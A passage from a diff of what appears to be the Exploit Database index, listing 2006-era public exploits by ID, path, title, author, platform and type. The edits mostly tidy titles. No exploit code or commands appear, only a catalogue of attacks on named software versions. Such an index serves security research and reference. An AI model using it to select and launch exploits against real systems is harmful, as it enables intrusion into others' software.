SQL Injection",2006-03-19,LOTFREE,php,webapps,0 1595,platforms/php/webapps/1595.php,"gCards 1.45 - Multiple Vulnerabilities",2006-03-20,rgod,php,webapps,0 1596,platforms/linux/local/1596.txt,"X.Org X11 (X11R6.9.0/X11R7.0) - Privilege Escalation",2006-03-20,"H D Moore",linux,local,0 1597,platforms/asp/webapps/1597.pl,"ASPPortal 3.1.1 - (downloadid) SQL Injection",2006-03-20,nukedx,asp,webapps,0 -1598,platforms/windows/dos/1598.html,"Microsoft Internet Explorer 6.0 - (script action handlers) (mshtml.dll) Denial of Service",2006-03-21,"Michal Zalewski",windows,dos,0 +1598,platforms/windows/dos/1598.html,"Microsoft Internet Explorer 6 - (script action handlers) (mshtml.dll) Denial of Service",2006-03-21,"Michal Zalewski",windows,dos,0 1599,platforms/windows/dos/1599.cpp,"Microsoft Windows 2003/XP - (IGMP v3) Denial of Service (MS06-007) (1)",2006-03-21,"Alexey Sintsov",windows,dos,0 -1600,platforms/php/webapps/1600.php,"FreeWPS 2.11 - (images.php) Remote Code Execution Exploit",2006-03-21,x128,php,webapps,0 +1600,platforms/php/webapps/1600.php,"FreeWPS 2.11 - (images.php) Remote Code Execution",2006-03-21,x128,php,webapps,0 1601,platforms/windows/dos/1601.c,"ASP.NET w3wp - (COM Components) Remote Crash Exploit",2006-03-22,"Debasis Mohanty",windows,dos,0 1602,platforms/multiple/remote/1602.c,"BomberClone < 0.11.6.2 - (Error Messages) Remote Buffer Overflow",2006-03-22,"esca zoo",multiple,remote,11000 1603,platforms/windows/dos/1603.c,"Microsoft Windows 2003/XP - (IGMP v3) Denial of Service (MS06-007) (2)",2006-03-22,Firestorm,windows,dos,0 -1604,platforms/windows/dos/1604.html,"Microsoft Internet Explorer 6.0 - (mshtml.dll checkbox) Crash",2006-03-22,"Stelian Ene",windows,dos,0 +1604,platforms/windows/dos/1604.html,"Microsoft Internet Explorer 6 - (mshtml.dll checkbox) Crash",2006-03-22,"Stelian Ene",windows,dos,0 1605,platforms/php/webapps/1605.php,"XHP CMS 0.5 - (upload) Remote Command Execution Exploit",2006-03-22,rgod,php,webapps,0 -1606,platforms/windows/remote/1606.html,"Microsoft Internet Explorer - (createTextRang) Remote Code Execution Exploit",2006-03-23,darkeagle,windows,remote,0 +1606,platforms/windows/remote/1606.html,"Microsoft Internet Explorer - (createTextRang) Remote Code Execution",2006-03-23,darkeagle,windows,remote,0 1607,platforms/windows/remote/1607.cpp,"Microsoft Internet Explorer - (createTextRang) Download Shellcode Exploit (1)",2006-03-23,ATmaCA,windows,remote,0 -1608,platforms/php/webapps/1608.php,"WebAlbum 2.02pl - COOKIE[skin2] Remote Code Execution Exploit",2006-03-25,rgod,php,webapps,0 +1608,platforms/php/webapps/1608.php,"WebAlbum 2.02pl - COOKIE[skin2] Remote Code Execution",2006-03-25,rgod,php,webapps,0 1609,platforms/php/webapps/1609.pl,"PHP Ticket 0.71 - 'search.php' SQL Injection",2006-03-25,undefined1_,php,webapps,0 1610,platforms/php/webapps/1610.txt,"phpBookingCalendar 1.0c - (details_view.php) SQL Injection",2006-03-25,undefined1_,php,webapps,0 1611,platforms/php/webapps/1611.pl,"TFT Gallery 0.10 - Password Disclosure Remote Exploit",2006-03-25,undefined1_,php,webapps,0 -1612,platforms/php/webapps/1612.php,"CuteNews 1.4.1 - (function.php) Local File Inclusion Exploit",2006-03-26,"Hamid Ebadi",php,webapps,0 +1612,platforms/php/webapps/1612.php,"CuteNews 1.4.1 - (function.php) Local File Inclusion",2006-03-26,"Hamid Ebadi",php,webapps,0 1613,platforms/windows/dos/1613.c,"Vavoom 1.19.1 - Multiple Vulnerabilities/Denial of Service",2006-03-26,"Luigi Auriemma",windows,dos,0 1614,platforms/windows/dos/1614.c,"csDoom 0.7 - Multiple Vulnerabilities/Denial of Service",2006-03-26,"Luigi Auriemma",windows,dos,0 1615,platforms/windows/dos/1615.txt,"Microsoft Office Products - Array Index Bounds Error (Unpatched) (PoC)",2006-03-27,posidron,windows,dos,0 1616,platforms/php/webapps/1616.pl,"Aztek Forum 4.00 - (myadmin.php) User Privilege Escalation",2006-03-26,Sparah,php,webapps,0 -1617,platforms/php/webapps/1617.php,"PHPCollab 2.x / NetOffice 2.x - (sendpassword.php) SQL Injection",2006-03-28,rgod,php,webapps,0 +1617,platforms/php/webapps/1617.php,"PHPCollab 2.x / NetOffice 2.x - 'sendpassword.php' SQL Injection",2006-03-28,rgod,php,webapps,0 1618,platforms/php/webapps/1618.c,"GreyMatter WebLog 1.21d - Remote Command Execution Exploit (1)",2006-03-28,No_Face_King,php,webapps,0 1619,platforms/php/webapps/1619.pl,"GreyMatter WebLog 1.21d - Remote Command Execution Exploit (2)",2006-03-28,Hessam-x,php,webapps,0 1620,platforms/windows/remote/1620.pm,"Microsoft Internet Explorer - (createTextRang) Remote Exploit (Metasploit)",2006-04-01,"Randy Flood",windows,remote,0 @@ -1366,22 +1367,22 @@ id,file,description,date,author,platform,type,port 1624,platforms/tru64/local/1624.pl,"Tru64 UNIX 5.0 - (Rev. 910) rdist NLSPATH Buffer Overflow",2006-03-29,"Kevin Finisterre",tru64,local,0 1625,platforms/tru64/local/1625.pl,"Tru64 UNIX 5.0 - (Rev. 910) edauth NLSPATH Buffer Overflow",2006-03-29,"Kevin Finisterre",tru64,local,0 1626,platforms/windows/remote/1626.pm,"PeerCast 0.1216 - Remote Buffer Overflow (Metasploit)",2006-03-30,"H D Moore",windows,remote,7144 -1627,platforms/php/webapps/1627.php,"Claroline 1.7.4 - (scormExport.inc.php) Remote Code Execution Exploit",2006-03-30,rgod,php,webapps,0 +1627,platforms/php/webapps/1627.php,"Claroline 1.7.4 - (scormExport.inc.php) Remote Code Execution",2006-03-30,rgod,php,webapps,0 1628,platforms/windows/remote/1628.cpp,"Microsoft Internet Explorer - (createTextRang) Download Shellcode Exploit (2)",2006-03-31,ATmaCA,windows,remote,0 -1629,platforms/php/webapps/1629.pl,"SQuery 4.5 - (libpath) Remote File Inclusion Exploit",2006-04-01,uid0,php,webapps,0 -1630,platforms/php/webapps/1630.pl,"PHPNuke-Clan 3.0.1 - (vwar_root2) Remote File Inclusion Exploit",2006-04-01,uid0,php,webapps,0 -1631,platforms/php/webapps/1631.php,"ReloadCMS 1.2.5 - Cross-Site Scripting / Remote Code Execution Exploit",2006-04-02,rgod,php,webapps,0 -1632,platforms/php/webapps/1632.pl,"VWar 1.5.0 R12 - Remote File Inclusion Exploit",2006-04-02,uid0,php,webapps,0 +1629,platforms/php/webapps/1629.pl,"SQuery 4.5 - (libpath) Remote File Inclusion",2006-04-01,uid0,php,webapps,0 +1630,platforms/php/webapps/1630.pl,"PHPNuke-Clan 3.0.1 - (vwar_root2) Remote File Inclusion",2006-04-01,uid0,php,webapps,0 +1631,platforms/php/webapps/1631.php,"ReloadCMS 1.2.5 - Cross-Site Scripting / Remote Code Execution",2006-04-02,rgod,php,webapps,0 +1632,platforms/php/webapps/1632.pl,"VWar 1.5.0 R12 - Remote File Inclusion",2006-04-02,uid0,php,webapps,0 1633,platforms/windows/dos/1633.c,"Total Commander 6.x - (unacev2.dll) Buffer Overflow (PoC)",2006-04-02,darkeagle,windows,dos,0 1634,platforms/linux/dos/1634.pl,"mpg123 0.59r Malformed mp3 - (SIGSEGV) (PoC)",2006-04-02,nitr0us,linux,dos,0 -1640,platforms/php/webapps/1640.pl,"AngelineCMS 0.8.1 - (installpath) Remote File Inclusion Exploit",2006-04-04,K-159,php,webapps,0 +1640,platforms/php/webapps/1640.pl,"AngelineCMS 0.8.1 - (installpath) Remote File Inclusion",2006-04-04,K-159,php,webapps,0 1641,platforms/linux/dos/1641.pl,"Libxine 1.14 - MPEG Stream Buffer Overflow (PoC)",2006-04-04,"Federico L. Bossi Bonin",linux,dos,0 1642,platforms/windows/dos/1642.c,"Ultr@VNC 1.0.1 - VNCLog::ReallyPrint Remote Buffer Overflow (PoC)",2006-04-04,"Luigi Auriemma",windows,dos,0 1643,platforms/windows/dos/1643.c,"Ultr@VNC 1.0.1 - client Log::ReallyPrint Buffer Overflow (PoC)",2006-04-04,"Luigi Auriemma",windows,dos,0 -1644,platforms/php/webapps/1644.pl,"INDEXU 5.0.1 - (base_path) Remote File Inclusion Exploit",2006-04-04,K-159,php,webapps,0 -1645,platforms/php/webapps/1645.pl,"Crafty Syntax Image Gallery 3.1g - Remote Code Execution Exploit",2006-04-04,undefined1_,php,webapps,0 -1646,platforms/php/webapps/1646.php,"phpMyChat 0.14.5 - (SYS enter) Remote Code Execution Exploit",2006-04-05,rgod,php,webapps,0 -1647,platforms/php/webapps/1647.php,"phpMyChat 0.15.0dev - (SYS enter) Remote Code Execution Exploit",2006-04-06,rgod,php,webapps,0 +1644,platforms/php/webapps/1644.pl,"INDEXU 5.0.1 - (base_path) Remote File Inclusion",2006-04-04,K-159,php,webapps,0 +1645,platforms/php/webapps/1645.pl,"Crafty Syntax Image Gallery 3.1g - Remote Code Execution",2006-04-04,undefined1_,php,webapps,0 +1646,platforms/php/webapps/1646.php,"phpMyChat 0.14.5 - (SYS enter) Remote Code Execution",2006-04-05,rgod,php,webapps,0 +1647,platforms/php/webapps/1647.php,"phpMyChat 0.15.0dev - (SYS enter) Remote Code Execution",2006-04-06,rgod,php,webapps,0 1650,platforms/php/webapps/1650.pl,"Horde Help Viewer 3.1 - Remote Command Execution Exploit",2006-04-07,deese,php,webapps,0 1651,platforms/php/dos/1651.php,"ADODB < 4.70 - (tmssql.php) Denial of Service",2006-04-09,rgod,php,dos,0 1652,platforms/php/webapps/1652.php,"ADODB < 4.70 (PHPOpenChat 3.0.x) - Server.php SQL Injection",2006-04-09,rgod,php,webapps,0 @@ -1390,35 +1391,35 @@ id,file,description,date,author,platform,type,port 1655,platforms/php/webapps/1655.php,"XBrite Members 1.1 - 'id' SQL Injection",2006-04-09,snatcher,php,webapps,0 1656,platforms/php/webapps/1656.txt,"Sire 2.0 - (lire.php) Remote File Inclusion / Arbitrary File Upload",2006-04-09,simo64,php,webapps,0 1657,platforms/linux/dos/1657.asm,"Linux Kernel 2.6.x - 'sys_timer_create()' Local Denial of Service",2006-04-09,fingerout,linux,dos,0 -1659,platforms/php/webapps/1659.php,"phpList 2.10.2 - GLOBALS[] Remote Code Execution Exploit",2006-04-10,rgod,php,webapps,0 +1659,platforms/php/webapps/1659.php,"phpList 2.10.2 - GLOBALS[] Remote Code Execution",2006-04-10,rgod,php,webapps,0 1660,platforms/php/webapps/1660.pm,"Horde 3.0.9/3.1.0 - (Help Viewer) Remote Code Execution (Metasploit)",2006-04-10,Inkubus,php,webapps,0 -1661,platforms/php/webapps/1661.pl,"phpBB 2.0.19 - (user_sig_bbcode_uid) Remote Code Execution Exploit",2006-04-10,RusH,php,webapps,0 +1661,platforms/php/webapps/1661.pl,"phpBB 2.0.19 - (user_sig_bbcode_uid) Remote Code Execution",2006-04-10,RusH,php,webapps,0 1662,platforms/php/webapps/1662.php,"Clansys 1.1 (showid) - SQL Injection",2006-04-10,snatcher,php,webapps,0 1663,platforms/php/webapps/1663.php,"Simplog 0.9.2 - (s) Remote Commands Execution Exploit",2006-04-11,rgod,php,webapps,0 1664,platforms/windows/remote/1664.py,"Ultr@VNC 1.0.1 - client Log::ReallyPrint Buffer Overflow Exploit",2006-04-11,"Paul Haas",windows,remote,0 -1665,platforms/php/webapps/1665.pl,"Sphider 1.3 - (configset.php) Arbitrary Remote File Inclusion Exploit",2006-04-12,rgod,php,webapps,0 -1666,platforms/php/webapps/1666.php,"PHP121 Instant Messenger 1.4 - Remote Code Execution Exploit",2006-04-12,rgod,php,webapps,0 +1665,platforms/php/webapps/1665.pl,"Sphider 1.3 - (configset.php) Arbitrary Remote File Inclusion",2006-04-12,rgod,php,webapps,0 +1666,platforms/php/webapps/1666.php,"PHP121 Instant Messenger 1.4 - Remote Code Execution",2006-04-12,rgod,php,webapps,0 1667,platforms/multiple/dos/1667.html,"Mozilla Firefox 1.5.0.1 / Camino 1.0 - Null Pointer Dereference Crash",2006-04-13,BuHa,multiple,dos,0 1668,platforms/php/webapps/1668.php,"vBulletin ImpEx 1.74 - Remote Command Execution Exploit",2006-04-13,ReZEN,php,webapps,0 1669,platforms/cgi/webapps/1669.pl,"Censtore 7.3.x - (censtore.cgi) Remote Command Execution Exploit",2006-04-13,FOX_MULDER,cgi,webapps,0 1670,platforms/cgi/webapps/1670.pl,"quizz 1.01 - (quizz.pl) Remote Command Execution Exploit",2006-04-13,FOX_MULDER,cgi,webapps,0 1671,platforms/multiple/dos/1671.c,"panic-reloaded - TCP Denial of Service Tool",2006-04-13,hash,multiple,dos,0 -1672,platforms/php/webapps/1672.pl,"PAJAX 0.5.1 - Remote Code Execution Exploit",2006-04-13,Stoney,php,webapps,0 +1672,platforms/php/webapps/1672.pl,"PAJAX 0.5.1 - Remote Code Execution",2006-04-13,Stoney,php,webapps,0 1673,platforms/php/webapps/1673.php,"phpWebSite 0.10.2 - (hub_dir) Remote Commands Execution Exploit",2006-04-14,rgod,php,webapps,0 1674,platforms/php/webapps/1674.txt,"osCommerce 2.2 - (extras) Source Code Disclosure",2006-04-14,rgod,php,webapps,0 1677,platforms/cgi/webapps/1677.php,"SysInfo 1.21 - (sysinfo.cgi) Remote Command Execution Exploit",2006-04-14,rgod,cgi,webapps,0 1678,platforms/php/webapps/1678.php,"PHP Album 0.3.2.3 - Remote Command Execution Exploit",2006-04-15,rgod,php,webapps,0 -1679,platforms/novell/remote/1679.pm,"Novell Messenger Server 2.0 - (Accept-Language) Remote Overflow (Metasploit)",2006-04-15,"H D Moore",novell,remote,8300 -1680,platforms/cgi/webapps/1680.pm,"Symantec Sygate Management Server - (login) SQL Injection (Metasploit)",2006-04-15,Nicob,cgi,webapps,0 +1679,platforms/novell/remote/1679.pm,"Novell Messenger Server 2.0 - 'Accept-Language' Remote Overflow (Metasploit)",2006-04-15,"H D Moore",novell,remote,8300 +1680,platforms/cgi/webapps/1680.pm,"Symantec Sygate Management Server - 'LOGIN' SQL Injection (Metasploit)",2006-04-15,Nicob,cgi,webapps,0 1681,platforms/windows/remote/1681.pm,"Sybase EAServer 5.2 - (WebConsole) Remote Stack Overflow (Metasploit)",2006-04-15,anonymous,windows,remote,8080 1682,platforms/php/webapps/1682.php,"Fuju News 1.0 - Authentication Bypass / SQL Injection",2006-04-16,snatcher,php,webapps,0 1683,platforms/php/webapps/1683.php,"Blackorpheus ClanMemberSkript 1.0 - SQL Injection",2006-04-16,snatcher,php,webapps,0 1686,platforms/php/webapps/1686.pl,"FlexBB 0.5.5 - (/inc/start.php _COOKIE) SQL Bypass Exploit",2006-04-17,Devil-00,php,webapps,0 1687,platforms/php/webapps/1687.txt,"MyEvent 1.3 - (myevent_path) Remote File Inclusion",2006-04-17,botan,php,webapps,0 1688,platforms/windows/dos/1688.c,"Neon Responder 5.4 - (Clock Synchronization) Denial of Service",2006-04-17,"Stefan Lochbihler",windows,dos,0 -1694,platforms/php/webapps/1694.pl,"Internet PhotoShow (page) - Remote File Inclusion Exploit",2006-04-18,Hessam-x,php,webapps,0 -1695,platforms/php/webapps/1695.pl,"PHP Net Tools 2.7.1 - Remote Code Execution Exploit",2006-04-18,FOX_MULDER,php,webapps,0 -1697,platforms/php/webapps/1697.php,"PCPIN Chat 5.0.4 - (login/language) Remote Code Execution Exploit",2006-04-19,rgod,php,webapps,0 +1694,platforms/php/webapps/1694.pl,"Internet PhotoShow (page) - Remote File Inclusion",2006-04-18,Hessam-x,php,webapps,0 +1695,platforms/php/webapps/1695.pl,"PHP Net Tools 2.7.1 - Remote Code Execution",2006-04-18,FOX_MULDER,php,webapps,0 +1697,platforms/php/webapps/1697.php,"PCPIN Chat 5.0.4 - (login/language) Remote Code Execution",2006-04-19,rgod,php,webapps,0 1698,platforms/php/webapps/1698.php,"Mambo 4.5.3 & Joomla 1.0.7 - (feed) Full Path Disclosure / Denial of Service",2006-04-19,trueend5,php,webapps,0 1699,platforms/php/webapps/1699.txt,"RechnungsZentrale V2 <= 1.1.3 - Remote File Inclusion",2006-04-19,"GroundZero Security",php,webapps,0 1700,platforms/asp/webapps/1700.pl,"ASPSitem 1.83 - (Haberler.asp) SQL Injection",2006-04-19,nukedx,asp,webapps,0 @@ -1427,26 +1428,26 @@ id,file,description,date,author,platform,type,port 1704,platforms/php/webapps/1704.pl,"CoreNews 2.0.1 - (userid) SQL Injection",2006-04-21,nukedx,php,webapps,0 1705,platforms/php/webapps/1705.pl,"Simplog 0.9.3 - (tid) SQL Injection",2006-04-21,nukedx,php,webapps,0 1706,platforms/php/webapps/1706.txt,"dForum 1.5 - (DFORUM_PATH) Multiple Remote File Inclusions",2006-04-21,nukedx,php,webapps,0 -1707,platforms/php/webapps/1707.pl,"My Gaming Ladder Combo System 7.0 - Remote Code Execution Exploit",2006-04-22,nukedx,php,webapps,0 +1707,platforms/php/webapps/1707.pl,"My Gaming Ladder Combo System 7.0 - Remote Code Execution",2006-04-22,nukedx,php,webapps,0 1708,platforms/windows/dos/1708.txt,"Skulltag 0.96f - (Version String) Remote Format String (PoC)",2006-04-23,"Luigi Auriemma",windows,dos,0 1709,platforms/multiple/dos/1709.txt,"OpenTTD 0.4.7 - Multiple Vulnerabilities",2006-04-23,"Luigi Auriemma",multiple,dos,0 1710,platforms/php/webapps/1710.txt,"Clansys 1.1 - 'index.php' PHP Code Insertion",2006-04-23,nukedx,php,webapps,0 1711,platforms/php/webapps/1711.txt,"Built2Go PHP Movie Review 2B - Remote File Inclusion",2006-04-23,"Camille Myers",php,webapps,0 -1712,platforms/osx/dos/1712.html,"Apple Mac OSX Safari 2.0.3 (417.9.2) - Multiple Vulnerabilities",2006-04-24,"Tom Ferris",osx,dos,0 +1712,platforms/osx/dos/1712.html,"Apple Mac OS X Safari 2.0.3 (417.9.2) - Multiple Vulnerabilities",2006-04-24,"Tom Ferris",osx,dos,0 1713,platforms/php/webapps/1713.pl,"FlexBB 0.5.5 - (function/showprofile.php) SQL Injection",2006-04-24,Devil-00,php,webapps,0 1714,platforms/asp/webapps/1714.txt,"BK Forum 4.0 - (member.asp) SQL Injection",2006-04-24,n0m3rcy,asp,webapps,0 -1715,platforms/osx/dos/1715.html,"Apple Mac OSX Safari 2.0.3 - (417.9.2) (ROWSPAN) Denial of Service (PoC)",2006-04-24,"Yannick von Arx",osx,dos,0 +1715,platforms/osx/dos/1715.html,"Apple Mac OS X Safari 2.0.3 - (417.9.2) (ROWSPAN) Denial of Service (PoC)",2006-04-24,"Yannick von Arx",osx,dos,0 1716,platforms/multiple/dos/1716.html,"Mozilla Firefox 1.5.0.2 - (js320.dll/xpcom_core.dll) Denial of Service (PoC)",2006-04-24,splices,multiple,dos,0 1717,platforms/linux/remote/1717.c,"Fenice Oms 1.10 - (long get request) Remote Buffer Overflow",2006-04-25,c0d3r,linux,remote,0 1718,platforms/hardware/dos/1718.pl,"OCE 3121/3122 Printer - 'parser.exe' Denial of Service",2006-04-26,sh4d0wman,hardware,dos,0 -1719,platforms/multiple/local/1719.txt,"Oracle 10g Release 2 - (DBMS_EXPORT_EXTENSION) SQL Exploit",2006-04-26,N1V1Hd,multiple,local,0 -1720,platforms/php/webapps/1720.pl,"Invision Power Board 2.1.5 - (lastdate) Remote Code Execution Exploit",2006-04-26,RusH,php,webapps,0 +1719,platforms/multiple/local/1719.txt,"Oracle 10g Release 2 - 'DBMS_EXPORT_EXTENSION' SQL Exploit",2006-04-26,N1V1Hd,multiple,local,0 +1720,platforms/php/webapps/1720.pl,"Invision Power Board 2.1.5 - (lastdate) Remote Code Execution",2006-04-26,RusH,php,webapps,0 1721,platforms/windows/dos/1721.pl,"BL4 SMTP Server < 0.1.5 - Remote Buffer Overflow (PoC)",2006-04-27,"Dedi Dwianto",windows,dos,0 1722,platforms/php/webapps/1722.txt,"TopList 1.3.8 - (phpBB Hack) Remote File Inclusion (1)",2006-04-27,[Oo],php,webapps,0 -1723,platforms/php/webapps/1723.txt,"Advanced GuestBook 2.4.0 - (phpBB) File Inclusion",2006-04-28,[Oo],php,webapps,0 +1723,platforms/php/webapps/1723.txt,"Advanced Guestbook 2.4.0 - (phpBB) File Inclusion",2006-04-28,[Oo],php,webapps,0 1724,platforms/php/webapps/1724.pl,"TopList 1.3.8 - (phpBB Hack) Remote File Inclusion (2)",2006-04-28,FOX_MULDER,php,webapps,0 -1725,platforms/php/webapps/1725.pl,"Advanced GuestBook 2.4.0 - (phpBB) Remote File Inclusion Exploit",2006-04-28,n0m3rcy,php,webapps,0 -1726,platforms/php/webapps/1726.pl,"Invision Power Board 2.1.5 - search.php Remote Code Execution Exploit",2006-04-29,"Javier Olascoaga",php,webapps,0 +1725,platforms/php/webapps/1725.pl,"Advanced Guestbook 2.4.0 - (phpBB) Remote File Inclusion",2006-04-28,n0m3rcy,php,webapps,0 +1726,platforms/php/webapps/1726.pl,"Invision Power Board 2.1.5 - search.php Remote Code Execution",2006-04-29,"Javier Olascoaga",php,webapps,0 1727,platforms/php/webapps/1727.txt,"openPHPNuke 2.3.3 - Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 1728,platforms/php/webapps/1728.txt,"Knowledge Base Mod 2.0.2 - (phpBB) Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 1729,platforms/php/webapps/1729.txt,"Limbo CMS 1.0.4.2 - (sql.php) Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 @@ -1455,23 +1456,23 @@ id,file,description,date,author,platform,type,port 1732,platforms/php/webapps/1732.pl,"Aardvark Topsites PHP 4.2.2 - (lostpw.php) Remote File Inclusion",2006-04-30,cijfer,php,webapps,0 1733,platforms/php/webapps/1733.pl,"Invision Power Board 2.1.5 - (from_contact) SQL Injection",2006-05-01,"Ykstortion Security",php,webapps,0 1738,platforms/php/webapps/1738.php,"X7 Chat 2.0 - (help_file) Remote Command Execution",2006-05-02,rgod,php,webapps,0 -1739,platforms/osx/remote/1739.pl,"Darwin Streaming Server 4.1.2 - (parse_xml.cgi) Code Execution Exploit",2003-02-24,FOX_MULDER,osx,remote,0 -1740,platforms/php/webapps/1740.pl,"Fast Click 1.1.3 / 2.3.8 - (show.php) Remote File Inclusion Exploit",2006-05-02,R@1D3N,php,webapps,0 +1739,platforms/osx/remote/1739.pl,"Darwin Streaming Server 4.1.2 - (parse_xml.cgi) Code Execution",2003-02-24,FOX_MULDER,osx,remote,0 +1740,platforms/php/webapps/1740.pl,"Fast Click 1.1.3 / 2.3.8 - (show.php) Remote File Inclusion",2006-05-02,R@1D3N,php,webapps,0 1741,platforms/linux/remote/1741.c,"MySQL 5.0.20 - COM_TABLE_DUMP Memory Leak/Remote Buffer Overflow Exploit",2006-05-02,"Stefano Di Paola",linux,remote,3306 1742,platforms/linux/remote/1742.c,"MySQL 4.1.18 / 5.0.20 - Local+Remote Information Leakage Exploit",2006-05-02,"Stefano Di Paola",linux,remote,0 1743,platforms/windows/dos/1743.pl,"Golden FTP Server Pro 2.70 - (APPE) Remote Buffer Overflow (PoC)",2006-05-03,"Jerome Athias",windows,dos,0 -1744,platforms/php/webapps/1744.pl,"Albinator 2.0.6 - (Config_rootdir) Remote File Inclusion Exploit",2006-05-03,webDEViL,php,webapps,0 +1744,platforms/php/webapps/1744.pl,"Albinator 2.0.6 - (Config_rootdir) Remote File Inclusion",2006-05-03,webDEViL,php,webapps,0 1746,platforms/linux/dos/1746.pl,"zawhttpd 0.8.23 - (GET) Remote Buffer Overflow Denial of Service",2006-05-04,"Kamil Sienicki",linux,dos,0 -1747,platforms/php/webapps/1747.pl,"Auction 1.3m - (phpbb_root_path) Remote File Inclusion",2006-05-04,webDEViL,php,webapps,0 +1747,platforms/php/webapps/1747.pl,"Auction 1.3m - 'phpbb_root_path' Remote File Inclusion",2006-05-04,webDEViL,php,webapps,0 1748,platforms/windows/dos/1748.py,"XM Easy Personal FTP Server 4.3 - (USER) Remote Buffer Overflow (PoC)",2006-05-04,rewterz,windows,dos,0 1749,platforms/windows/dos/1749.pl,"acFTP FTP Server 1.4 - (USER) Remote Buffer Overflow (PoC)",2006-05-04,Preddy,windows,dos,0 1750,platforms/linux/remote/1750.c,"Quake 3 Engine 1.32b - R_RemapShader() Remote Client Buffer Overflow Exploit",2006-05-05,landser,linux,remote,0 1751,platforms/php/webapps/1751.php,"Limbo CMS 1.0.4.2 - 'catid' SQL Injection",2006-05-05,[Oo],php,webapps,0 -1752,platforms/php/webapps/1752.pl,"StatIt 4 - (statitpath) Remote File Inclusion Exploit",2006-05-05,IGNOR3,php,webapps,0 +1752,platforms/php/webapps/1752.pl,"StatIt 4 - (statitpath) Remote File Inclusion",2006-05-05,IGNOR3,php,webapps,0 1753,platforms/php/webapps/1753.txt,"TotalCalendar 2.30 - (inc) Remote File Inclusion",2006-05-05,Aesthetico,php,webapps,0 -1754,platforms/windows/dos/1754.py,"FileCOPA FTP Server 1.01 - (USER) Remote Pre-Authenticated Denial of Service",2006-05-05,Bigeazer,windows,dos,0 +1754,platforms/windows/dos/1754.py,"FileCOPA FTP Server 1.01 - (USER) Remote Pre-Authentication Denial of Service",2006-05-05,Bigeazer,windows,dos,0 1755,platforms/cgi/webapps/1755.py,"AWStats 6.5 - (migrate) Remote Shell Command Injection",2006-05-06,redsand,cgi,webapps,0 -1756,platforms/php/webapps/1756.pl,"HiveMail 1.3 - (addressbook.add.php) Remote Code Execution Exploit",2006-05-06,[Oo],php,webapps,0 +1756,platforms/php/webapps/1756.pl,"HiveMail 1.3 - (addressbook.add.php) Remote Code Execution",2006-05-06,[Oo],php,webapps,0 1757,platforms/windows/dos/1757.c,"acFTP FTP Server 1.4 - (USER) Remote Denial of Service",2006-05-06,Omni,windows,dos,0 1758,platforms/windows/dos/1758.pl,"TinyFTPD 1.4 - (USER) Remote Buffer Overflow Denial of Service",2006-05-06,[Oo],windows,dos,0 1759,platforms/asp/webapps/1759.txt,"VP-ASP 6.00 - (shopcurrency.asp) SQL Injection",2006-05-06,tracewar,asp,webapps,0 @@ -1479,10 +1480,10 @@ id,file,description,date,author,platform,type,port 1761,platforms/php/webapps/1761.pl,"Jetbox CMS 2.1 - (relative_script_path) Remote File Inclusion",2006-05-07,beford,php,webapps,0 1763,platforms/php/webapps/1763.txt,"ACal 2.2.6 - (day.php) Remote File Inclusion",2006-05-07,PiNGuX,php,webapps,0 1764,platforms/php/webapps/1764.txt,"EQdkp 1.3.0 - (dbal.php) Remote File Inclusion",2006-05-07,OLiBekaS,php,webapps,0 -1765,platforms/php/webapps/1765.pl,"Dokeos Lms 1.6.4 - (authldap.php) Remote File Inclusion Exploit",2006-05-08,beford,php,webapps,0 -1766,platforms/php/webapps/1766.pl,"Claroline e-Learning 1.75 - (ldap.inc.php) Remote File Inclusion Exploit",2006-05-08,beford,php,webapps,0 +1765,platforms/php/webapps/1765.pl,"Dokeos Lms 1.6.4 - (authldap.php) Remote File Inclusion",2006-05-08,beford,php,webapps,0 +1766,platforms/php/webapps/1766.pl,"Claroline E-Learning 1.75 - (ldap.inc.php) Remote File Inclusion",2006-05-08,beford,php,webapps,0 1767,platforms/php/webapps/1767.txt,"ActualAnalyzer Server 8.23 - (rf) Remote File Inclusion",2006-05-08,Aesthetico,php,webapps,0 -1768,platforms/php/webapps/1768.php,"ActualAnalyzer Pro 6.88 - (rf) Remote File Inclusion Exploit",2006-05-08,ReZEN,php,webapps,0 +1768,platforms/php/webapps/1768.php,"ActualAnalyzer Pro 6.88 - (rf) Remote File Inclusion",2006-05-08,ReZEN,php,webapps,0 1769,platforms/php/webapps/1769.txt,"phpListPro 2.01 - Multiple Remote File Inclusion",2006-05-08,Aesthetico,php,webapps,0 1772,platforms/windows/local/1772.c,"Intel Wireless Service - 's24evmon.exe' Shared Memory Exploit",2006-05-09,"Ruben Santamarta ",windows,local,0 1773,platforms/php/webapps/1773.txt,"phpRaid 3.0.b3 - (phpBB/SMF) Remote File Inclusion",2006-05-09,"Kurdish Security",php,webapps,0 @@ -1499,7 +1500,7 @@ id,file,description,date,author,platform,type,port 1784,platforms/windows/dos/1784.txt,"raydium svn 309 - Multiple Vulnerabilities",2006-05-14,"Luigi Auriemma",windows,dos,0 1785,platforms/php/webapps/1785.php,"Sugar Suite Open Source 4.2 - (OptimisticLock) Remote Exploit",2006-05-14,rgod,php,webapps,0 1787,platforms/windows/remote/1787.py,"freeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow",2006-05-15,"Tauqeer Ahmad",windows,remote,22 -1788,platforms/windows/remote/1788.pm,"PuTTy.exe 0.53 - (validation) Remote Buffer Overflow (Metasploit)",2006-05-15,y0,windows,remote,0 +1788,platforms/windows/remote/1788.pm,"PuTTy.exe 0.53 - (Validation) Remote Buffer Overflow (Metasploit)",2006-05-15,y0,windows,remote,0 1789,platforms/php/webapps/1789.txt,"TR Newsportal 0.36tr1 - (poll.php) Remote File Inclusion",2006-05-15,Kacper,php,webapps,0 1790,platforms/php/webapps/1790.txt,"Squirrelcart 2.2.0 - (cart_content.php) Remote File Inclusion",2006-05-15,OLiBekaS,php,webapps,0 1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Patched EXE)",2006-05-16,redsand,multiple,remote,5900 @@ -1515,10 +1516,10 @@ id,file,description,date,author,platform,type,port 1801,platforms/multiple/dos/1801.txt,"libextractor 0.5.13 - Multiple Heap Overflows (PoC)",2006-05-17,"Luigi Auriemma",multiple,dos,0 1802,platforms/multiple/dos/1802.html,"Mozilla Firefox 1.5.0.3 - (Loop) Denial of Service",2006-05-18,"Gianni Amato",multiple,dos,0 1804,platforms/php/webapps/1804.txt,"phpBazar 2.1.0 - Remote File Inclusion / Authentication Bypass",2006-05-19,[Oo],php,webapps,0 